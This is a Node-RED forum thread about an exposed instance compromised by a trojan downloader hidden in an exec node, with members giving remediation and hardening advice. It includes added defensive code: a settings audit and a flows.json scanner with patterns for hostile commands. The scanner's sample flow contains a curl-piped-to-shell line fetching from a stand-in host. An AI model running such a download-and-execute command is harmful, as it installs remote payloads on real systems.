Node-RED compromise hack

Hello,
I have this exec function appearing on my flow. I deleted it twice and it keeps appearing.
Can someone help with this problem?

Thank you.

That looks extremely suspect!!
Why are you still leaving it to run?

The IP appears on 3 black lists

  • If your Node Red is publicly facing (in some way) - take action now to review your security
  • Review recently installed Nodes
  • Review who has access to your flows/system/network/servers

@TotallyInformation, @Steve-Mcl

Seen anything like this?

This is:

TrojanDownloader:Linux/Morila!MTB

As it has likely run on that system, the system is compromised and likely requires a complete rebuild.

Title changed as a hack is confirmed.


A strong reminder to all who come across this post:

DO NOT EXPOSE YOUR NODE-RED SERVER TO THE INTERNET UNLESS YOU KNOW WHAT YOU ARE DOING

It WILL be compromised.

1 Like

It certainly looks like you have exposed your node-red to the internet and it has been abused. I won't say hacked since it was quite probably wide open / no password / no SSL etc.

If you don't know how to secure node-red, there are lots of posts on the forum covering this topic, but it is not a simple task to do it properly.

If you want to use node-red from across the internet, but you are not sure how, then perhaps a preprepared fully secure cloud provider of Node-RED would be better? There are several around. I'd recommend FlowFuse (for disclosure, it is the company I work for).

1 Like
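A concrete contrast between the "wide open / no password / no SSL" setup described above and a locked-down settings.js, as an added example that is not from this thread or the Node-RED project. The keys are Node-RED settings.js keys; the bcrypt hashes, PEM contents and credentialSecret value are placeholders, and binding to loopback assumes the instance is reached over a VPN or SSH tunnel rather than a router port-forward. The audit function is a helper written for this example, not something Node-RED ships.

```javascript
// Added example, not from the thread or the Node-RED project: the "wide open"
// settings.js the thread describes (no password, no TLS, listening on every
// interface) next to a locked-down one, plus an audit function that reports
// what is missing. Keys are Node-RED settings.js keys; hash, PEM and secret
// values are placeholders.

// What a default-ish settings.js amounts to: the editor is reachable by anyone
// who can hit port 1880, and a router port-forward makes "anyone" the internet.
const weakSettings = {
  uiPort: 1880,
  // no uiHost       -> binds every interface
  // no adminAuth    -> editor and admin API need no login
  // no https        -> credentials and flows cross the network in clear text
  // no httpNodeAuth -> HTTP In endpoints are unauthenticated
};

const hardenedSettings = {
  uiPort: 1880,
  uiHost: "127.0.0.1",             // loopback only; reach it over a VPN or SSH tunnel
  adminAuth: {
    type: "credentials",
    users: [{
      username: "admin",
      // bcrypt hash produced by `node-red admin hash-pw`; placeholder, not a real hash
      password: "$2b$08$PLACEHOLDER_REPLACE_WITH_hash-pw_OUTPUT",
      permissions: "*",
    }],
  },
  // In a real settings.js these are fs.readFileSync(...) of the PEM files.
  https: { key: "<contents of privkey.pem>", cert: "<contents of cert.pem>" },
  requireHttps: true,              // redirect any plain-HTTP request to HTTPS
  httpNodeAuth: { user: "dash", pass: "$2b$08$PLACEHOLDER_SECOND_hash-pw_OUTPUT" },
  credentialSecret: "PLACEHOLDER-long-random-string",  // key for flows_cred.json
  functionExternalModules: false,  // function nodes cannot pull in npm modules
};

const BCRYPT = /^\$2[aby]\$\d{2}\$/;   // bcrypt hashes start with $2a$/$2b$/$2y$ + cost

// Return a list of findings; an empty list means every check passed.
function auditSettings(s) {
  const issues = [];
  if (!s.adminAuth) {
    issues.push("adminAuth missing: editor and admin API accept anyone who can reach the port");
  } else {
    for (const u of s.adminAuth.users || []) {
      if (!BCRYPT.test(u.password || "")) issues.push(`adminAuth user "${u.username}": password is not a bcrypt hash`);
    }
  }
  if (!s.https || !s.requireHttps) issues.push("no TLS: login credentials and flow contents travel in clear text");
  if (!/^(127\.0\.0\.1|::1|localhost)$/.test(s.uiHost || "")) issues.push("uiHost not loopback: Node-RED listens on every interface");
  if (!s.httpNodeAuth) issues.push("httpNodeAuth missing: HTTP In endpoints need no authentication");
  else if (!BCRYPT.test(s.httpNodeAuth.pass || "")) issues.push("httpNodeAuth.pass is not a bcrypt hash");
  if (!s.credentialSecret) issues.push("credentialSecret unset: Node-RED generates one and stores it beside the flows file");
  if (s.functionExternalModules) issues.push("functionExternalModules enabled: a function node can install and require npm packages");
  return issues;
}

console.log("weak:", auditSettings(weakSettings));
console.log("hardened:", auditSettings(hardenedSettings));
// A real settings.js ends with: module.exports = hardenedSettings;
```

Generate the real hashes with `node-red admin hash-pw` and paste the output in place of the placeholders; the point of `auditSettings` is that each check maps to one of the gaps the thread calls out (no password, no SSL, open to the world), so a settings file that passes it has at least closed those.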

@steveh92

Given we were discussing what level of security you should employ for publicly facing Node RED instances - enjoy this somewhat raw post of the kind of event you could end up dealing with if it is not taken seriously!

3 Likes

Sorry, another reinforcement message. This trojan is a gateway for other malware. This means that there will now be any number of malware apps and processes on the server. Some of which may be well hidden.

It could also act as a gateway for things like ransomware and may act as an entry point for access to other poorly secured devices on the same network.

These things can spread literally like wildfire and take over an entire network of devices in seconds.

Many home networks are particularly vulnerable since convenience is often prioritised over security and where home routers may have minimal security.

1 Like

I never press that inject node.
I never merge the flow.
And I always delete the exec function and deploy the node.

Does it matter what I did or is it compromised?

a new screenshot

It's compromised

Trust us, someone else has already deployed and injected.

2 Likes

Maybe you are lucky and you can close any ports that you opened on your router, delete that exec node and all will be well.

Or maybe multiple devices on your network are now running malware, your online banking and other accounts are compromised and your devices have taken an active role as a botnet in the Russia/Ukraine war.

The malware got onto your Node-red server. Why would you assume that the only thing it did was insert that exec node [and not deploy]?

As it is most likely that someone accessed the Node-RED Editor, it is they who will have injected and run the compromise. I'm afraid it is certainly compromised.

To put it lightly :grin:

@meccip

  • Re-image that machine
  • Scan all devices on your network
  • Don't open Node RED (or any port) to the public until you have thoroughly understood the risks (and addressed them fully)
  • Know that they are skilled at what they do

I have had this situation for 3 days and nothing has happened. On my Raspberry I have my solar system. nodered is getting info from it and sending it to my phone. What can be done with this? Turn my inverter to Hybrid state. My bank account is not online. I am a cash guy. In my network I have a Windows 10 with nodered on it but just for testing. I have some devices that give me temperature and turn on/off some relays.
I just turned my Raspberry port OFF and am working on nodered password security.

  • Re-bake the now ruined pi (setting a password will NOT make it better). Why is it still on??
  • If you need to keep your flows, export / import into a NON-NETWORKED machine and remove any out of the "norm" node setup (BEFORE DEPLOY)
  • Scan any devices on your network that are capable of running processes that can be harmful
  • Close your firewall/ports (seriously close them!)
  • Keep them closed, until you fully understand what you're doing
1 Like
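The "export to a non-networked machine and remove anything out of the norm before deploying" step above can be done mechanically. The following is an added example, not from this thread or the Node-RED project: it reads an exported flows.json as plain JSON and flags the node types that can run commands on the host (exec nodes, inject nodes set to fire once on startup, function nodes that reach for `require`/`child_process`), and escalates an inject-once wired straight into an exec, which runs with nobody clicking anything. The node property names are the standard Node-RED flow fields; the sample flow, the command patterns and the `dropper.invalid` host are constructed for the example.

```javascript
// Added example, not from the thread or the Node-RED project: an offline
// review of an exported flows.json, flagging the node types that can run
// commands on the host before the flow is imported or deployed anywhere.
// Node property names (type, command, once, onceDelay, func, wires) are
// the standard Node-RED flow fields; the sample flow below is constructed.

// Heuristics for an exec command that deserves a second look. Not exhaustive,
// and a match is a reason to read the command, not proof of malice.
const SUSPICIOUS_COMMAND = [
  { re: /\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b/i, why: "download piped straight into a shell" },
  { re: /\bchmod\s+\+x\b/i,                          why: "marks a dropped file executable" },
  { re: /\/tmp\/|\/dev\/shm\//,                      why: "stages files in a world-writable directory" },
  { re: /\bbase64\s+(-d|--decode)\b/i,               why: "decodes an embedded payload" },
  { re: /\bnohup\b|\s&\s*$/,                         why: "detaches a long-running process" },
];

// Inspect one node object from flows.json; returns zero or more findings.
function inspectNode(node) {
  if (node.type === "exec") {
    const cmd = String(node.command || "");
    const hits = SUSPICIOUS_COMMAND.filter((h) => h.re.test(cmd)).map((h) => h.why);
    return [{
      id: node.id, type: "exec",
      severity: hits.length ? "high" : "review",
      reason: hits.length ? hits.join("; ") : "exec node runs host commands (verify it is yours)",
      detail: cmd,
    }];
  }
  if (node.type === "inject" && node.once === true) {
    return [{
      id: node.id, type: "inject", severity: "review",
      reason: "fires automatically on deploy/startup; nobody has to click it",
      detail: `onceDelay=${node.onceDelay}`,
    }];
  }
  if (node.type === "function" && /child_process|require\s*\(/.test(String(node.func || ""))) {
    return [{ id: node.id, type: "function", severity: "high",
      reason: "function node reaches for require()/child_process", detail: String(node.name || "") }];
  }
  return [];
}

// Scan a whole flows export; also escalate inject(once) -> exec chains, which
// run without any human interaction as soon as the flow is deployed.
function scanFlows(flows) {
  const byId = new Map(flows.map((n) => [n.id, n]));
  const findings = flows.flatMap(inspectNode);
  for (const n of flows) {
    if (n.type !== "inject" || n.once !== true) continue;
    for (const targetId of (n.wires || []).flat()) {
      const t = byId.get(targetId);
      if (t && t.type === "exec") {
        findings.push({ id: n.id, type: "chain", severity: "high",
          reason: `inject ${n.id} auto-triggers exec ${t.id} on deploy`, detail: String(t.command || "") });
      }
    }
  }
  return findings;
}

// Constructed sample: a legitimate temperature flow plus the kind of pair the
// thread's screenshot shows (an inject wired into an exec that downloads and runs).
const SAMPLE_FLOWS = [
  { id: "tab1",  type: "tab",    label: "Solar" },
  { id: "inj1",  type: "inject", z: "tab1", name: "every 5 min", repeat: "300", once: false, wires: [["exec1"]] },
  { id: "exec1", type: "exec",   z: "tab1", name: "cpu temp", command: "vcgencmd measure_temp", wires: [["dbg1"], [], []] },
  { id: "dbg1",  type: "debug",  z: "tab1", wires: [] },
  { id: "inj2",  type: "inject", z: "tab1", name: "", once: true, onceDelay: 0.1, wires: [["exec2"]] },
  { id: "exec2", type: "exec",   z: "tab1", name: "", command: "curl -s http://dropper.invalid/x.sh | sh", wires: [[], [], []] },
];

for (const f of scanFlows(SAMPLE_FLOWS)) {
  console.log(`[${f.severity}] ${f.type} ${f.id}: ${f.reason} -- ${f.detail}`);
}
```

To use it on a real export, replace `SAMPLE_FLOWS` with `JSON.parse(fs.readFileSync("flows.json", "utf8"))` on the offline machine and read every "review" and "high" line before anything is imported; the legitimate `vcgencmd` exec still shows up as "review", because the reviewer, not the script, is the one who knows which exec nodes they wrote.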

Let's assume that he accessed the Node-RED Editor and put that exec function there. To make it work, you have to deploy the flows? In this case it is like I deployed the flows? I am asking this because every time I deploy the flows I get some notifications on my phone when some functions start to initialize.

I have Arduino and esp01 as devices. I don't think those can do harm.

Stop kidding yourself!

It's running - there's a Process ID associated to the Node (5532)!
You Don't have to deploy the whole flow to start something

All advice has been given

[Screenshot 2023-10-22 at 17.36.25]

1 Like

If this popped up on my nodered I would immediately unplug the entire house from my internet connection. Have to go completely offline until you assess every single network device in your possession. And every network device you've connected to within the last few weeks.

Like Marcus said, it's literally running the exec node in your first screenshot.

You need to unplug ALL network things in your house and do a whole lot of research and damage control. Assume that you've just leaked:
- all of your passwords to everything
- all data on all of your devices (phone, computer, iPad, everything)
- all of your addresses (email and physical)
- access to everything that was on your network in the last few weeks

And work backwards from there. This is the kind of thing that would cause me to enable that new Apple "lock down" mode.

2 Likes

Yes. Assuming they didn't also get some other access as well.

Yes.

Assuming they didn't temporarily disconnect those.


Seriously though, it is going to be quicker, safer and easier - and give you far more peace of mind - to create a new SD card and swap things over carefully.

Well, not impossible but unlikely. However, if those control anything important, it might be possible for someone to cause damage - like turning on your boiler to max. Probably not a high risk but not zero either.

There is also the - admittedly probably fairly unlikely - possibility that you have exposed your comings and goings (when you are at home) to someone who might make use of it.

Well, someone may now have the ability to also contact your phone. That is worth money right there. And in some countries where phone SIM takeovers are rife, it can be quite a problem since you may have other services that can be taken over if someone has access to hijack your phone (SMS, etc).

There is no absolute way for us to know the risks. It depends on a lot of factors and in most cases it will be fairly low but there are certainly some areas of the world where the risk could be very high indeed.

So you should make sure that your phone is up-to-date with patches and is properly secured. If your airtime provider allows it, you might also want to lock your SIM to prevent take-over. If you have any 2-factor authentication that relies on SMS, get it changed ASAP to use an authenticator app (preferably one you can use on the PC as well such as Bitwarden premium or family accounts or Authy).

And double check your email accounts - maybe change passwords just to be doubly safe.

But only do this once you are certain that potentially compromised devices are offline.


Listen, don't panic about all this, the overall probability of a cascade of issues is quite low in most cases and in most countries. But the impact can be very high so worth taking precautions.

Most of this is stuff you should be doing anyway as a digital citizen.

4 Likes

@marcus-j-davies

Glad I got this email notification, turned off the instance straight away last night. Don't want to leave it on while not in use. Think today will involve some systems hardening.

2 Likes